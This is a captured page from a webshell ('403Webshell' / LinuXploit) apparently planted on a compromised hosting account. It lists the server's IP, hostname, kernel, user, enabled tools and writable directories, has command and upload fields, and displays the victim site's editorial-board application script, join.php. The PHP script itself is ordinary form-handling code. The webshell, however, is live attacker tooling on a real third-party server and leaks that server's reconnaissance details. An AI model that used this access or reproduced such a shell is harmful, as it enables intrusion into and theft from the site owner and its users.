403Webshell
Server IP : 192.169.170.185  /  Your IP : 216.73.216.97
Web Server : Apache
System : Linux p3plmcpnl495852.prod.phx3.secureserver.net 4.18.0-553.52.1.lve.el8.x86_64 #1 SMP Wed May 21 15:31:29 UTC 2025 x86_64
User : akhilnew ( 1712764)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/akhilnew/public_html/reflectivejournals.com/inc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /home/akhilnew/public_html/reflectivejournals.com/inc/join.php
<?php
if($decrypt_focus === '[JOIN_EDITORIAL]'):
	if(! isset($_POST['zipcode']) OR $_POST['zipcode'] !== '' OR strlen($_POST['zipcode']) > 0):
		die(result(false, 'You are not authorized user.'));
	endif;

	$position = isset($_POST['pos']) ? sanitize(escape($_POST['pos'])) : NULL;
	$name  = remexspace(escape($_POST['name']));
	$name  = str_replace('\"', '', strip_tags($name));
	$name  = preg_replace('/[!?,.](?![!?,.\s])/', '$0 ', $name);
	$name  = htmlentities($name, ENT_QUOTES);
	$name  = mb_convert_case($name, MB_CASE_TITLE, "UTF-8");
	$name  = stripslashes(stripcslashes($name));
	$email = remspace(sanitize_email(escape($_POST['email'])));
	$email = strtolower(strip_tags($email));
	$phones	= remexspace(sanitize(escape($_POST['phone'])));
	$phones	= preg_replace('/[^0-9+-,]/', '', strip_tags($phones));
	$degree	= remexspace(sanitize(escape($_POST['degree'])));
	$degree	= str_replace('\"', '', strip_tags($degree));
	$degree	= htmlentities($degree, ENT_QUOTES);
	$degree	= preg_replace_callback('/[a-zA-Z]+/', 'change_case', $degree);
	$degree	= stripslashes(stripcslashes($degree));
	$post	= remexspace(escape($_POST['post']));
	$post	= str_replace('\"', '', strip_tags($post));
	$post	= preg_replace('/[!?,.](?![!?,.\s])/', '$0 ', $post);
	$post	= htmlentities($post, ENT_QUOTES);
	$post 	= mb_convert_case($post, MB_CASE_TITLE, "UTF-8");
	$post 	= preg_replace_callback('/[a-zA-Z]+/', 'change_case', $post);
	$post	= stripslashes(stripcslashes($post));
	$dept	= remexspace(escape($_POST['dept']));
	$dept	= str_replace('\"', '', strip_tags($dept));
	$dept	= preg_replace('/[!?,.](?![!?,.\s])/', '$0 ', $dept);
	$dept	= htmlentities($dept, ENT_QUOTES);
	$dept	= preg_replace_callback('/[a-zA-Z]+/', 'change_case', $dept);
	$dept	= stripslashes(stripcslashes($dept));
	$reCAPTCHA = isset($_POST['g-recaptcha-response']) ? $_POST['g-recaptcha-response'] : '';
	$responseData = gCAPTCHA($reCAPTCHA);

	$photoexts = array('jpeg', 'jpg', 'png', 'gif', 'bmp');
	$val_exts = explode(',', $extensions);
	$creation = date('Y-m-d H:i:s');

	$stmt = $mysqli->prepare("SELECT * FROM editors WHERE email = ?") or die(result(false, "An error occurred. Please try after some time."));
	$stmt->bind_param('s', $email);
	$stmt->execute();
	$stmt->store_result();
	$countrowsofmember = $stmt->num_rows();
	$stmt->close();

	$stmt = $mysqli->prepare("SELECT * FROM editors WHERE email = ?") or die(result(false, "An error occurred. Please try after some time."));
	$stmt->bind_param('s', $email);
	$stmt->execute();
	$stmt->store_result();
	$countrowsofrequest = $stmt->num_rows();
	$stmt->close();

	if(empty($position)):
		die(result(false, "Please select your position."));
	elseif(empty($name)):
		die(result(false, "Please enter your name."));
	elseif(empty($email)):
		die(result(false, "Please enter your email address."));
	elseif(!validate_email($email)):
		die(result(false, "Please enter a valid email address."));
	elseif($countrowsofmember > 0):
		die(result(false, "You are already member. Please visit <a href=\"{$baseurl}board\" target=\"_blank\">{$baseurl}board</a>."));
	elseif($countrowsofrequest > 0):
		die(result(false, "We have already received your request."));
	elseif((empty($phones) && strlen($phones) == 0)):
		die(result(false, "Please enter your phone number."));
	elseif(empty($degree)):
		die(result(false, "Please enter your degree."));
	elseif(empty($post)):
		die(result(false, "Please enter your post."));
	elseif(empty($dept)):
		die(result(false, "Please enter your department and college."));
	elseif(!isset($_FILES['photo']['tmp_name'][0])):
		die(result(false, "Please attach your photo."));
	elseif(!in_array(strtolower(pathinfo($_FILES['photo']['name'], PATHINFO_EXTENSION)), $photoexts)):
		die(result(false, "Please attach a valid photo."));
	elseif(!isset($_FILES['resume']['tmp_name'][0])):
		die(result(false, "Please attach your resume."));
	elseif(!in_array(strtolower(pathinfo($_FILES['resume']['name'], PATHINFO_EXTENSION)), $val_exts)):
		die(result(false, "Please attach a valid resume."));
	elseif(!$reCAPTCHA):
		die(result(false, 'Please click on the reCAPTCHA box.'));
	elseif(!$responseData->success):
		die(result(false, 'Robot verification failed, Please try again.'));
	else:
		$photo = sanitize(escape($_FILES['photo']['name']));
		$photo = stripslashes(stripcslashes(strip_tags($photo)));
		$phototmp = sanitize($_FILES['photo']['tmp_name']);
		$photoext = strtolower(pathinfo($photo, PATHINFO_EXTENSION));
		$photosize= sanitize($_FILES['photo']['size']);
		if(($photosize / 1024) > 1024):
			die(result(false, "Please choose photo less than 1 MB."));
		endif;
	
		$resume = sanitize(escape($_FILES['resume']['name']));
		$resume	= stripslashes(stripcslashes(strip_tags($resume)));
		$resumetmp = sanitize($_FILES['resume']['tmp_name']);
		$resumeext = strtolower(pathinfo($resume, PATHINFO_EXTENSION));	
		$resumesize= sanitize($_FILES['resume']['size']);

		$newphoto  = date('ymdhis') . '_' .strtoupper($photoext) . '_' . str_pad($photosize, 8, 0, STR_PAD_LEFT) . '.' . $photoext;
		$newresume = date('ymdhis') . '_' . strtoupper($resumeext) . '_' . str_pad($resumesize, 8, 0, STR_PAD_LEFT) . '.' . $resumeext;

		if(!is_dir(rtrim($boardfileuploadpath, '/'))):
			@mkdir(rtrim($boardfileuploadpath, '/'));
		endif;

		if($photo):
			if(!move_uploaded_file($phototmp, $boardfileuploadpath . $newphoto)):
				die(result(false, "Picture has not been uploaded."));
			endif;
		else:
			$newphoto = "";
		endif;

		if(move_uploaded_file($resumetmp, $boardfileuploadpath . $newresume)):
			$stmt = $mysqli->prepare("INSERT INTO boardrequest(category, name, degree, post, content, email, phone, picture, resume, creation) VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?, ?)") or die(result(false, "An error occurred. Please try after some time."));
			$stmt->bind_param('ssssssssss', $position, $name, $degree, $post, $dept, $email, $phones, $newphoto, $newresume, $creation);
			$e = $stmt->execute();
			$insertid = $stmt->insert_id;
			$stmt->close();
			if($e):
				insertemail($email);

				$wsubject = 'Request for Editorial Board Member. #' . $insertid;
				$wbody  = '<table border="0" cellpadding="5" cellspacing="0" width="700">';
				$wbody .= '<tr bgcolor="#fff"><td align="left" valign="top" width="180">Position</td><td align="left" valign="top">: ' . $position . '</td></tr>';
				$wbody .= '<tr bgcolor="#ccc"><td align="left" valign="top" width="180">Full Name</td><td align="left" valign="top">: ' . $name . '</td></tr>';
				$wbody .= '<tr bgcolor="#fff"><td align="left" valign="top" width="180">Email</td><td align="left" valign="top">: ' . $email . '</td></tr>';
				$wbody .= '<tr bgcolor="#ccc"><td align="left" valign="top" width="180">Phone</td><td align="left" valign="top">: ' . $phones . '</td></tr>';
				$wbody .= '<tr bgcolor="#fff"><td align="left" valign="top" width="180">Degree</td><td align="left" valign="top">: ' . $degree . '</td></tr>';
				$wbody .= '<tr bgcolor="#ccc"><td align="left" valign="top" width="180">Post</td><td align="left" valign="top">: ' . $post . '</td></tr>';
				$wbody .= '<tr bgcolor="#fff"><td align="left" valign="top" width="180">Department and College</td><td align="left" valign="top">: ' . $dept . '</td></tr>';
				$wbody .= '</table>';

				$csubject= 'We received your request by ' . $name . '. #' . $insertid;
				$cbody	 = 'Dear ' . $name . ',<br /><br>Thank you for contacting us to join editorial board of <i>' . $websitename . '</i>.<br><br>';
				$cbody	.= 'We will contact you within 7 working days.<br><br>';
				$cbody	.= '<b>Important Links:</b><br>';
				$cbody	.= 'For Author Instructions: ' . $baseurl . 'instructions<br>';
				$cbody	.= 'For Past Issues: ' . $baseurl . 'archives<br><br>';
				$cbody	.= '<div style="line-height:18px">--<br>Regards<br>' . str_replace(PHP_EOL, '<br>', $signature) . '</div><br><br>';
				$cbody	.= '<b style="color:#009933"><img src="' . $imageurl . 'tree.png" alt="Tree" />&nbsp;&nbsp;Please consider the environment before you print this email.</b>';

				$cc = '';$bcc = '';$attachments = array($boardfileuploadpath . $newphoto, $boardfileuploadpath . $newresume);
				if($mailer == 'amazon'):
					@AmazonMail($websiteemail, $cc, $bcc, $wsubject, $wbody, $attachments, $fromname, $fromemail, $name, $email);
					@AmazonMail($email, $cc, $bcc, $csubject, $cbody, array(), $fromname, $fromemail, $fromname, $fromemail);
				elseif($mailer == 'phpmailer'):
					@PHPMail($websiteemail, $cc, $bcc, $wsubject, $wbody, $attachments, $fromname, $fromemail, $name, $email);
					@PHPMail($email, $cc, $bcc, $csubject, $cbody, array(), $fromname, $fromemail, $fromname, $fromemail);
				endif;

				die(result(true, "Thank you, Your application has been successfully submitted!"));
			else:
				die(result(false, "An error occurred. Please try after some time."));
			endif;
		else:
			die(result(false, "An error occurred. Please try after some time."));
		endif;
	endif;
else:
	die(result(false, "Access Denied!"));
endif;
?>

Youez - 2016 - github.com/yon3zu
LinuXploit